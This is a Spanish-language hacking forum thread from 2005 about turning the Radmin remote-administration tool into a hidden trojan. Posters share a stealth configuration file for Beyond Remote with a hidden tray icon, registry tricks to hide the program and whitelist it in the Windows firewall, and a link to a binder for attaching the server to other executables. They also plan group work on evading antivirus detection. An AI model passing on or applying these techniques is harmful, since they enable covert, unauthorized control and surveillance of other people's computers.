actualizacion de troyanizando radmin

Iniciado por octalh, 23 Septiembre 2005, 22:03 PM

0 Miembros y 3 Visitantes están viendo este tema.

SeniorX

entonces está mas que claro que te debes cambiar de antivirus, o quizas actualizarlo.
try {
     live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}

Precaución: La programacion puede producir adiccion

octalh

ok lo tomare en cuenta aunque en si el post no trata sobre antivirus eso esta fuera de contexto , si quieres puedes hacer lo mismo con VNC o cualquier otro...  mas que una guia paso a paso es un texto para ampliar conocimientos y usar tu imaginacion...

SeniorX

de todas maneras el texto está bueno en ese contexto y felicitaciones men y gracias por el trabajo que te diste.
try {
     live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}

Precaución: La programacion puede producir adiccion

_R€d_

SeniorX que mal agradecido eres xDDDDD

Pues hablando de antivirus; los detectan solo los mejores; para mi el mejor: Nod32...0:)

ibiza-tdi

K onda;
Soy novato en esto...je...Y tengo un problema con el tuto...de donde  obtengo el archivo "AdmDll.dll" ??...No lo encuentro por ninguna parte...Espero k me puedan ayudar...

Saludos
Ibiza-Tdi... 8)
CoMpEtItIoN RuNs In OuR GeNeS AnD ThE HuNt FoR a MaTe HaS AlWaYs BeEn ThE UltImAtE FoRm Of CoMpEtItIoN

ibiza-tdi

K onda
Ya vi cual era el problema es k el k habia instalado era el Radmin 2.2 y no el 2.1 ... solo falta probar los archivos a ver k tal...

Saludos
Ibiza-Tdi... 8)
CoMpEtItIoN RuNs In OuR GeNeS AnD ThE HuNt FoR a MaTe HaS AlWaYs BeEn ThE UltImAtE FoRm Of CoMpEtItIoN

uniqdom

hace un tiempo atras hice un ejecutable en c++ que hacia toda la configuracion de radmin 2.1. Este creaba las llaves en el registro (password, icono escondido,, etc), y copiaba el radmin y su dll a la carpeta /windows/.

si alguien quiere el codigo me avisa.
vale decir que radmin ya es detectado!!
ahora estoy usando un programa (administrador de redes tambien) que se llama Beyond Remote (version 1.2.1.531) (permite controlar el computador remoto, ver la pantalla remota, transferencia de archivos, chat, reiniciar y apagar el pc remoto. lo unico que le falta es Shell remota). bueno... este programita se basa en la configuracion de un archivo (BRServer.cfg) por lo que no necesitan modificar casi nada en el registro (solo hacer que se inicie al encender el pc).
aqui el archivo de configuracion.
[CONFIG]
Password=±²³´µ¶·¸¹
EnableLogFile=0
LogFile=C:\ARCHIVOS DE PROGRAMA\DATAAPPLES\BEYONDREMOTE\BRSERVER.log
ListenPort=5424
RC=
PasswordProtectTrayIcon=1
HideTrayIcon=1
IPFiltering=0
EnableTransparencyDetection=0


lo unico que deben hacer es usar un binder. les recomiendo IPACKER TOOL (Muy buen programa, aunque descontinuado. usa una dll que es detectada por los antivirus.)
puedes descargarlo de aqui:
http://ns2.elhacker.net/DECRIPT/BINDER/Ipacker_tool.rar

anajnu

exelente !!! y funciona   pero me gustaria saber por favor si quiero añadir un ejecutable cualquiera a la lista de los permitidos por el firewall como creo el bat para eso por ejemplo un server.exe 

octalh

Citarsi se fijan en el registro en la siguiente clave

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

encontraran todas las aplicaciones y puertos que el fw tiene con permisos, lo que estamos haciendo es agregar nuestro radmin a la lista de las aplicaciones que estan permitidas para darles salida 

esto solo es pa el fw del sp2

salu2

intruder_inside

Pero no hey forma de modificar el nombre del dll y con ingenieria inversa hacer referencia dentro del r_admin al nuevo nombre de la dll, por que es que el antivirus lo reconoce es por el nombre y no por la esencia, osea no por lo que dentro de la libreria dinamica hay, creo que todos estamos a esperas de que sea indetectable por los antivirus asi que o a trabajar todos juntos para hacerlo o esperar 10 años mas a que alguien lo haga.

Propongo que hagamos una entrada principal que se llame ocultando el r_admin de los antivirus y posteemos todos nuestro conocimientos, pruebas e investigaciones para asi hacerlos nosotros en grupo y llevarnos los creditos de por vida, por que hasta donde se muchos quieren usarlo incluso yo   ;D